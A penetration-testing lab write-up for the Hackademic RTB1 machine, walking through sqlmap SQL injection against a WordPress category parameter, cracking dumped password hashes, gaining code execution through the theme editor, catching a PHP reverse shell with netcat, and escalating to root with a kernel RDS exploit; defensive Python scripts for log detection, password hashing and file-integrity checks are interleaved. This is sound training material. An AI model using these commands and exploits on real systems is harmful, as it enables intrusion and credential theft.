Core dump overflow


Pentest lab - Hackademic RTB1


Mission statement

Get root and read the contents of the file ‘key.txt’ in the root directory.

Recon

I started with a port scan of the target, but only port 80 is open:

[Screenshot: hackademic website]

I looked at the links and noticed the URL for the post is http://192.168.80.162/Hackademic_RTB1/?p=9 and for the archives is http://192.168.80.162/Hackademic_RTB1/?cat=1. Before going to Sqlmap, I manually inserted quotes in the URLs and, sure enough, got a SQL error for the cat parameter:

[Screenshot: SQL error]
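The quote probe that produced that error is exactly what the web server's access log records, which makes it a cheap detection point. The script below is an added example, not part of the original post: it parses Apache combined-format lines, percent-decodes each query parameter value and flags values containing a quote, a SQL comment opener or a SQL keyword, plus requests carrying sqlmap's default user-agent. The log lines are constructed for the example and only reuse the IPs and paths from the walkthrough.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not from the original post): a normal request,
# the manual quote probe against ?cat=, a sqlmap-style boolean probe, and a normal
# request for a post. Timestamps are made up.
SAMPLE_LOG = """\
192.168.80.161 - - [01/Jan/2015:13:01:02 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.80.161 - - [01/Jan/2015:13:01:09 +0000] "GET /Hackademic_RTB1/?cat=1' HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
192.168.80.161 - - [01/Jan/2015:13:02:30 +0000] "GET /Hackademic_RTB1/?cat=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev"
192.168.80.161 - - [01/Jan/2015:13:02:31 +0000] "GET /Hackademic_RTB1/?p=9 HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators inside a decoded parameter value: a quote, a SQL comment opener, or a SQL
# keyword. Kept deliberately narrow; tune it for parameters that legitimately carry text.
SQLI_VALUE_RE = re.compile(
    r"""['"]|--|/\*|\b(?:and|or|union|select|sleep|benchmark)\b""", re.IGNORECASE
)


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing looks like SQLi probing."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    reasons = []
    # parse_qsl percent-decodes the values, so the regex sees the text the database saw.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SQLI_VALUE_RE.search(value):
            reasons.append(f"suspicious value in parameter {name!r}: {value!r}")
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "target": target, "reasons": reasons}


def scan_log(text):
    """Scan every line of an access log and keep only the findings."""
    findings = []
    for line in text.splitlines():
        hit = scan_line(line)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["target"], "; ".join(hit["reasons"]))
```

The user-agent check is the weak signal (sqlmap can be told to randomise it); the decoded-value check is the one worth keeping, and on a real site it should be paired with the 500/SQL-error responses the probe triggers so that a single quote in a search box does not page anyone.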

Exploit

Next I enumerated the databases with Sqlmap:

sqlmap -u "http://192.168.80.162/Hackademic_RTB1/?cat=1" --dbms=MySQL --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

Since this is a web-based challenge, I proceeded to look into the wordpress database:

sqlmap -u "http://192.168.80.162/Hackademic_RTB1/?cat=1" --dbms=MySQL -D wordpress --tables
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

I further enumerated the wp_users table; here I am showing only the relevant columns:

user_pass                user_login
21232f297a57a5a743894a0e4a801fc3  NickJames
b986448f0bb9e5e124ca91d3d650f52c  JohnSmith
7cbb3252ba6b7e9c422fac5334d22054  GeorgeMiller
a6e514f9486b83cb53d8d932f9a04292  TonyBlack
8601f6e1028a8e8a966f6c33fcd9aec4  JasonKonnors
50484c19f1afdaf3841a0d821ed393d2  MaxBucky

Cracking the hashes revealed the passwords of all the users:

admin
PUPPIES
q1w2e3
napoleon
maxwell
kernel
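Why that was so quick: the hashes are 32 hex characters with no salt or prefix, i.e. plain MD5, so one hash of each candidate word is enough to check every user at once. The script below is an added example, not code from the post; it reuses the logins, hashes and cracked passwords listed above, and contrasts the lookup with a salted, iterated PBKDF2 store constructed here for the same six users (the iteration count is kept low so the example runs fast; the salted store and its user-to-password pairing are assumptions of the demo, not data from the box).

```python
import hashlib
import hmac
import os

# Logins and hashes as enumerated from wp_users in the post (32 hex chars: unsalted MD5).
WP_USERS = {
    "NickJames": "21232f297a57a5a743894a0e4a801fc3",
    "JohnSmith": "b986448f0bb9e5e124ca91d3d650f52c",
    "GeorgeMiller": "7cbb3252ba6b7e9c422fac5334d22054",
    "TonyBlack": "a6e514f9486b83cb53d8d932f9a04292",
    "JasonKonnors": "8601f6e1028a8e8a966f6c33fcd9aec4",
    "MaxBucky": "50484c19f1afdaf3841a0d821ed393d2",
}

# The candidate list is just the passwords the post reports; a real wordlist is far larger.
WORDLIST = ["admin", "PUPPIES", "q1w2e3", "napoleon", "maxwell", "kernel"]


def md5_lookup(hashes_by_login, wordlist):
    """Unsalted MD5: hash each candidate once, then every user's hash is a dictionary lookup.
    Cost is len(wordlist) hash operations no matter how many users there are."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {login: table[h] for login, h in hashes_by_login.items() if h in table}


def pbkdf2_store(password, salt=None, iterations=10_000):
    """Salted, iterated hash. 10_000 iterations keeps the demo fast; production should use a
    far higher count, or a memory-hard function such as scrypt or Argon2."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "dk": dk}


def pbkdf2_verify(password, record):
    """Constant-time comparison so verification does not leak how many bytes matched."""
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(cand, record["dk"])


def salted_wordlist_cost(records_by_login, wordlist):
    """With a per-user salt there is no shared table: every candidate must be rehashed for
    every user. Returns (matches, number of hash operations performed)."""
    matches, ops = {}, 0
    for login, rec in records_by_login.items():
        for w in wordlist:
            ops += 1
            if pbkdf2_verify(w, rec):
                matches[login] = w
    return matches, ops


if __name__ == "__main__":
    print("MD5 lookup:", md5_lookup(WP_USERS, WORDLIST), "after", len(WORDLIST), "hashes")
    # Constructed salted store: same six logins, passwords paired in list order (assumption).
    store = {login: pbkdf2_store(pw) for login, pw in zip(WP_USERS, WORDLIST)}
    matches, ops = salted_wordlist_cost(store, WORDLIST)
    print("PBKDF2 store:", matches, "after", ops, "PBKDF2 runs of", store["NickJames"]["iterations"], "iterations")
```

The same six-word list still finds weak passwords in the salted store; what changes is the price per guess, which goes from one MD5 per word to one slow derivation per word per user. Salting removes the shared table, iteration count makes each entry cost something, and neither helps a user whose password is "admin".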

Then I went to the WordPress login page at http://192.168.80.162/Hackademic_RTB1/wp-login.php and logged in as NickJames (I assumed he was the admin because of his password). But there was nothing extraordinary to be done with his privileges, just adding and editing posts. We have more users to try though! When I reached GeorgeMiller, I noticed there were more actions available in the admin panel:

[Screenshot: admin panel]

In the Presentation tab I could edit the theme files for the site. I picked the 404.php file and first replaced its content with a single line that echoes a string, so that I confirm code actually executes before spending time on shells.

[Screenshot: PHP file edited]

When I went to the http://192.168.80.162/Hackademic_RTB1/wp-content/themes/starburst/404.php URL, I saw RCE displayed, so next I used the now-familiar reverse PHP shell from pentestmonkey. I set up my listener and visited the URL again to receive the shell:

nc -vnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.161] from (UNKNOWN) [192.168.80.162] 50723
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
 13:23:45 up  3:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=489(apache) groups=489(apache)
sh: no job control in this shell
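The theme editor turned an authenticated WordPress account into code execution by rewriting a file under wp-content/themes. That edit is visible to anything that baselines the web root. The script below is an added example, not part of the original post: it snapshots SHA-256 digests of every file under a directory, diffs two snapshots, and runs a constructed scenario in a temporary directory where a minimal "starburst" theme is baselined and then its 404.php is overwritten with the one-line echo from the walkthrough and a new file is added (the file contents are made up for the demo).

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map every file under root (path relative to root, '/'-separated) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            result[rel] = h.hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Report files that appeared, changed, or vanished since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo():
    """Constructed scenario: baseline a minimal theme directory, then replace 404.php the way
    the theme editor did in the walkthrough and add one extra file."""
    with tempfile.TemporaryDirectory() as docroot:
        theme = os.path.join(docroot, "wp-content", "themes", "starburst")
        os.makedirs(theme)
        originals = {  # made-up theme files
            "404.php": "<?php get_header(); ?>\n<h2>Not Found</h2>\n<?php get_footer(); ?>\n",
            "style.css": "/*\nTheme Name: starburst\n*/\n",
        }
        for name, body in originals.items():
            with open(os.path.join(theme, name), "w") as f:
                f.write(body)
        baseline = snapshot(docroot)

        # The edit from the post: the whole file body replaced by one echo line.
        with open(os.path.join(theme, "404.php"), "w") as f:
            f.write('<?php echo "RCE"; ?>\n')
        with open(os.path.join(theme, "extra.php"), "w") as f:
            f.write("<?php /* new file */ ?>\n")

        return diff_snapshots(baseline, snapshot(docroot))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Keep the baseline outside the web root and owned by a user other than the one the web server runs as (here apache), otherwise the same access that rewrites 404.php can rewrite the baseline. The edit route itself can be closed: defining DISALLOW_FILE_EDIT as true in wp-config.php removes the theme and plugin editors from the admin panel, so a compromised editor account no longer gets file write access through the UI.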

Privilege escalation

The shell kept echoing back the commands I was running but otherwise it worked fine. I didn't find anything interesting that I could use during local enumeration, so I then searched for privilege escalation exploits that might apply to the kernel version 2.6.31 found on the box. The exploit that worked was the RDS privilege escalation exploit by Dan Rosenberg. You can also find it on Kali with Searchsploit. I compiled it on my machine with the -m32 flag for the target architecture and transferred it via netcat. Then I ran it and stared a bit at the blinking cursor before confirming that it gave me root:

sh-4.0$ ./rds
./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
cat /root/key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com

Debriefing

The machine looked pretty tightly locked down, with only a web server running. But the WordPress version contained a known SQLi vulnerability that handed over the users' password hashes. One user had the rights to edit code on the server, which gave me (limited) access to the target. The kernel was vulnerable to a local root exploit, and from there it was game over.

GG, nice VM! Now let’s end with some wisdom straight from the cow’s mouth:

/ Don't relax! It's only your tension \
\ that's holding you together.        /
 -------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
